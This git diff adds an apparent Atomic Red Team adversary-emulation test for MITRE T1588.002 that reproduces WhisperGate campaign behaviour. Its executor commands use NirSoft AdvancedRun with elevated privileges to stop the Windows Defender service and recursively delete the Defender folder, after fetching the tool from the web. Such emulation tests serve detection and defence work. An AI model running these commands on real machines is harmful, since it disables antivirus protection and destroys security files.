diff --git a/atomics/T1588.002/T1588.002.yaml b/atomics/T1588.002/T1588.002.yaml new file mode 100644 index 00000000..d11cac47 --- /dev/null +++ b/atomics/T1588.002/T1588.002.yaml @@ -0,0 +1,36 @@ +attack_technique: T1588.002 +display_name: 'Obtain Capabilities: Tool' +atomic_tests: +- name: Run NirSoft AdvancedRun + description: | + Information on NirSoft AdvancedRun and it's creators found here: http://www.nirsoft.net/utils/advanced_run.html + This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign. + Upon successful execution, AdvancedRun.exe will run and stop Defender and attempt to delete the Defender folder on disk. + supported_platforms: + - windows + input_arguments: + local_folder: + description: Local path of AdvancedRun executable + type: Path + default: PathToAtomicsFolder\T1588.002\bin\AdvancedRun + local_executable: + description: name of the advancedrun executable + type: String + default: 'advancedrun.exe' + dependency_executor_name: powershell + dependencies: + - description: | + Advancedrun.exe must be located at #{local_folder}\#{local_executable} + prereq_command: | + if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip" + Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force + executor: + command: | + #{local_folder}\#{local_executable} /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run + #{local_folder}\#{local_executable} "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run + cleanup_command: | + Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore + name: powershell + elevation_required: true